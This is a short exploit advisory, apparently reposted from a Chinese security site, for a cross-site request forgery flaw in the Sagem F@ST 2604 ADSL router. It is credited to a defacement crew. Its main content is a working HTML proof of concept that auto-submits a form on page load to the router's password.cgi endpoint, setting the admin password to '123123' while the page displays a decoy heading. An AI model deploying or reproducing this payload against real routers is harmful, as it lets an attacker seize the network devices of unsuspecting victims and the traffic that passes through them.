|__| | | |__| |__| |__| |_/ |__] |__| |__/ | | |___ |___ | | | | | | | \_ |__] | | | \ ================================================================================ #### 标题: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router) 作者: KinG Of PiraTeS www.2cto.com t5r@hotmail.com 开发网站: http://www.sagem.com/index.php 影响版本: 253180972B May be Other Version are Affected 测试平台: [Windows 7 Edition Intégrale] #### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | 1)介绍 2)缺陷描述 3)测试示例 >> ---------------------------------------------------------------- 1)介绍 The Sagemcom F@st 2604 is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports. 2)缺陷描述 From SAGEM F@st 2604 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80 或许其他的版本也受影响 3)测试示例 < html > <body onload="javascript:document.forms[0].submit()"> <H2>Password successfully changed [CSRF Exploit change ADMIN password]</H2> <form method="POST" name="form0" action="http://www.2cto.com /password.cgi?sysPassword=123123"> </form> </body> </html> - 123123就是新密码 - #### Peace From Algeria
查看更多关于Sagem F@ST 2604 (ADSL Router)CSRF缺陷及修复 - 网站安全的详细内容...